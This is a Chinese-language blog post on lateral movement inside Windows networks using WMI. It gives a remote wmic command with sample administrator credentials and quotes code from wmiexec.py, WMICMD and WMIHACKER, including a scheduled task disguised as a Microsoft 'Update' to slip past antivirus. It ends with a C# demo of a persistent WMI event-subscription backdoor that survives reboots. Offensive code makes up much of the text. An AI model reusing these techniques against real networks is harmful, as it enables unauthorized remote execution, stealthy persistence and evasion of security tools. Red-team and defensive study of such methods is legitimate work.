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总结内网横向移动使用 wmic 执行命令的方法

最编程 2024-01-07 10:27:31


内网中,由于大多数 Windows 系统自带 wmic 命令, 所以 WMIC 是内网横向的常用方法之一,使用 WMI 的前置要求是,目标端口开放 135 端口,且允许随机一个高位端口进行通信。这是由于 WMI 是先通过 135 端口建立连接,而后通过随机的高位端口进行数据传输。

直接使用系统自带的 WMIC 进行连接,执行命令是无回显的,常常需要将执行的返回结果写入文件,再通过文件读取的方式将回显带回来。

WMIC /Node: /user:test\administrator /password:admin123! Process Call Create "cmd /c whoami > C:\Users\Test2019\AppData\Local\Temp\rs.log"

利用 net use 查看文件

net use \\\c$
type \\\c$\Users\Test2019\AppData\Local\Temp\rs.log


为了更方便的利用 WMIC,已有不少开源的利用工具,此处介绍一下三个比较有代表性的利用工具。

  1. wmiexec.py
  2. wmicmd


首先是 impacket 工具包里的 wmiexec.py。提供了通过 wmi 执行命令并回显的功能。其原理较为简单:通过 wmi 执行命令,并将执行结果保存文件,通过 smb 读取返回结果。如下是 wmiexec.py 的一个片段,其中 __output 为输出的临时文件, __transferClient 为 smb 的连接。所以,该工具的使用条件是需要 445、135 和高位随机的一个端口都允许通信。

class RemoteShell(cmd.Cmd):
    def __init__(self, share, win32Process, smbConnection, shell_type, silentCommand=False):
        self.__share = share
        self.__output = '\\' + OUTPUT_FILENAME
        self.__outputBuffer = str('')
        self.__shell = 'cmd.exe /Q /c '
        self.__shell_type = shell_type
        self.__pwsh = 'powershell.exe -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc '
        self.__win32Process = win32Process
        self.__transferClient = smbConnection
        self.__silentCommand = silentCommand
        self.__pwd = str('C:\\')
        self.__noOutput = False
        self.intro = '[!] Launching semi-interactive shell - Careful what you execute\n[!] Press help for extra shell commands'
        # We don't wanna deal with timeouts from now on.
        if self.__transferClient is not None:
            self.__noOutput = True
        # If the user wants to just execute a command without cmd.exe, set raw command and set no output
        if self.__silentCommand is True:
            self.__shell = ''

wmiexec.py 还支持无回显的方式进行命令执行。这种方式是不会建立 SMB 连接,也就不需要 445 端口的开放。

    parser.add_argument('-nooutput', action='store_true', default=False, help='whether or not to print the output '
                                                                             '(no SMB connection created)')


WMICMD 的实现原理和 wmiexec.py 有些出入。上面介绍了 WMICMD 之所以能得到回显的原因,是借助了 445 端口的 SMB 连接。而 WMICMD 能够做到不需要 445 端口就可以完成命令执行并回显。其原理是通过命令执行将执行结果写入注册表之中,再通过 WMI 对注册表进行操作,读取结果,这样一来就不需要 445 端口了。如下是 WMICMD 通过注册表获取执行结果回显的代码片段。

public string GetFilthyStdOut(string strKey)
            StringBuilder strOut = new StringBuilder();
            bool bSeenFinishedMarker = false;
            Console.WriteLine("[i] Getting stdout from registry from " + strKey);
            ManagementClass registry = new ManagementClass(this.Scope, new ManagementPath("StdRegProv"), null);
            // Enumerate the values
            ManagementBaseObject inParams = registry.GetMethodParameters("EnumValues");
            inParams["sSubKeyName"] = strKey;
            inParams["hDefKey"] = RegHive.HKEY_LOCAL_MACHINE;
            ManagementNamedValueCollection objCtx = new ManagementNamedValueCollection();
            objCtx.Add("__ProviderArchitecture", 64);
            objCtx.Add("__RequiredArchitecture", true);
            InvokeMethodOptions invokeOptions = new InvokeMethodOptions();
            invokeOptions.Context = objCtx;
            ManagementBaseObject outParams = registry.InvokeMethod("EnumValues", inParams, invokeOptions);
            string[] strValues = outParams["sNames"] as string[];


WMIHACKER 也是通过将命令执行将执行结果写入到注册表,但不一样的地方是 wmiexe.pywmicmd 是通过创建一个 win32Process 进程来执行命令,而 WMIHACKER 是使用事件触发器来调用 VB 代码,达到命令执行的效果。根据介绍,这种方式在当时可以绕过杀软。

如下是 WMIHACKER中AddSCHTASKWithres 函数的部分代码,可以看到,通过字符串的拼接组装构成了一个脚本代码,再利用了 ActiveScriptEventConsumer 在特定情况下会执行该脚本,避免使用了 Win32Process 来创建进程。

Function AddSCHTASKWithres(cmd,file)
    Set temp = SubobjSWbemServices.Get("ActiveScriptEventConsumer")
    Set asec = temp.spawninstance_
    Dim Schedule_Name
    Schedule_Name = genStr(6,12)
    wscript.echo "WMIHACKER : The Schedule Name is " &Schedule_Name
    asec.name="Windows COM Config Consumer"
    Asec.scripttext = "Const TriggerTypeDaily = 1 "&chr(10)&_
    "Const ActionTypeExec = 0 "&chr(10)&_
    "Set service = CreateObject(" &chr(34)&"Schedule.Service" &chr(34)&")"&chr(10)&_
    "Call service.Connect"&chr(10)&_
    "Dim rootFolder"&chr(10)&_
    "Set rootFolder = service.GetFolder(" &chr(34)&"\" &chr(34)&")"&chr(10)&_
    "Dim taskDefinition"&chr(10)&_
    "Set taskDefinition = service.NewTask(0)"&chr(10)&_
    "Dim regInfo"&chr(10)&_
    "Set regInfo = taskDefinition.RegistrationInfo"&chr(10)&_
    "regInfo.Description = " &chr(34)&"Update" &chr(34)&""&chr(10)&_
    "regInfo.Author = " &chr(34)&"Microsoft" &chr(34)&""&chr(10)&_
    "Dim settings"&chr(10)&_
    "Set settings = taskDefinition.settings"&chr(10)&_
    "settings.Enabled = True"&chr(10)&_
    "settings.StartWhenAvailable = True"&chr(10)&_
    "settings.Hidden = False"&chr(10)&_
    "settings.DisallowStartIfOnBatteries = False"&chr(10)&_
    "Dim triggers"&chr(10)&_
    "Set triggers = taskDefinition.triggers"&chr(10)&_
    "Dim trigger"&chr(10)&_
    "Set trigger = triggers.Create(7)"&chr(10)&_
    "Dim Action"&chr(10)&_
    "Set Action = taskDefinition.Actions.Create(ActionTypeExec)"&chr(10)&_
    "Action.Path = " &chr(34)&"c:\windows\system32\cmd.exe" &chr(34)&""&chr(10)&_
    "Action.arguments = chr(34) & " &chr(34)&"/c "&cmd&" > "&file&"" &chr(34)&" & chr(34)"&chr(10)&_
    "Dim objNet, LoginUser"&chr(10)&_
    "Set objNet = CreateObject(" &chr(34)&"WScript.Network" &chr(34)&")"&chr(10)&_
    "LoginUser = objNet.UserName"&chr(10)&_
    "    If UCase(LoginUser) = " &chr(34)&"SYSTEM" &chr(34)&" Then"&chr(10)&_
    "    Else"&chr(10)&_
    "    LoginUser = Empty"&chr(10)&_
    "    End If"&chr(10)&_
    "Call rootFolder.RegisterTaskDefinition(" & chr(34) & Schedule_Name &chr(34)&", taskDefinition, 6, LoginUser, , 3)"&chr(10)&_
    "Call rootFolder.DeleteTask(" &chr(34)& Schedule_Name &chr(34)&",0)"
    set asecpath=asec.put_                                        
    Set temp = SubobjSWbemServices.Get("__EventFilter")
    set evtflt = temp.spawninstance_
    evtflt.name="Windows COM Config Filter" 
    qstr = "SELECT * FROM __InstanceModificationEvent WITHIN 1 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
    set fltpath=evtflt.put_                                       
    Set temp = SubobjSWbemServices.Get("__FilterToConsumerBinding")
    set fcbnd = temp.spawninstance_
    WScript.Sleep 2000 ' 2 sec
    ReplacedFile = Replace(file,"\","\\")
    strQuery = "SELECT * FROM CIM_DataFile where name="&chr(34)&ReplacedFile&chr(34)
    Dim done
    done = false
    Do Until done
        Wscript.Sleep 2000
        Set colItems = objWMIService.ExecQuery(strQuery, "WQL", wbemFlagReturnImmediately + wbemFlagForwardOnly)
        For Each objItem in colItems
            return = objItem.GetEffectivePermission(2)
            If return Then
                WScript.Echo "WMIHACKER : File Write Success. "
                done = True
                WScript.Echo "WMIHACKER : COMMAND EXECTING... "
            End If
    wscript.echo "WMIHACKER : COMMAND EXEC SUCCESS, Wait to write in reg."
End Function

WMI 后门

WMICHACK 中使用事件触发器来完成命令执行,不仅如此,我们可以借助使用触发器来创建一个后门,

WMI 后门创建组要分为三个部分,EventFilterEventConsumerFilterToConsumerBinding。个人理解EventFilter 是触发的条件,EventConsumer 是触发后所要执行的动作,FilterToConsumerBinding 则是将二者进行绑定。如下代码,是使用C#编写的一个后门 Demo,可以实现在固定间隔时间后执行特定程序,且由于WMI后门的特性,重启后仍然还在,比较隐蔽。

using System;
using System.Collections.Generic;
using System.Linq;
using System.Management;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
namespace WMICore
    public partial class WMICore
        public string CreateEventFilter(string EventName,int time)
            ManagementClass wmiEventFilter = new ManagementClass(this.scope, new ManagementPath("__EventFilter"), null);
            String strQuery = @"SELECT * FROM __InstanceModificationEvent WITHIN "+time+" WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";
            WqlEventQuery myEventQuery = new WqlEventQuery(strQuery);
            var myEventFilter = wmiEventFilter.CreateInstance();
            myEventFilter["Name"] = EventName;
            myEventFilter["Query"] = myEventQuery.QueryString;
            myEventFilter["QueryLanguage"] = myEventQuery.QueryLanguage;
            myEventFilter["EventNameSpace"] = @"\root\cimv2";
            var eventPath = myEventFilter.Path.RelativePath; 
            Console.WriteLine("[*] Event filter created :" + eventPath);
            return eventPath;
        public string CreateEventConsumer(string name,string exePath) {
            var myEventConsumer = new ManagementClass(scope, new ManagementPath("CommandLineEventConsumer"), null).CreateInstance();
            myEventConsumer["Name"] = name;
            myEventConsumer["CommandLineTemplate"] = exePath;
            myEventConsumer["ExecutablePath"] = exePath;
            var eventConsumerPath = myEventConsumer.Path.RelativePath;
            Console.WriteLine("[*] Consumer filter created :" + eventConsumerPath);
            return eventConsumerPath;
        public void Binder(string myEventFilter,string myEventConsumer) {
            var myBinder = new ManagementClass(scope, new ManagementPath("__FilterToConsumerBinding"), null).CreateInstance();
            myBinder["Filter"] = myEventFilter;
            myBinder["Consumer"] = myEventConsumer;
            Console.WriteLine("[*] Subscription created");



Study Notes of WMI Persistence using wmic.exe (3gstudent.github.io)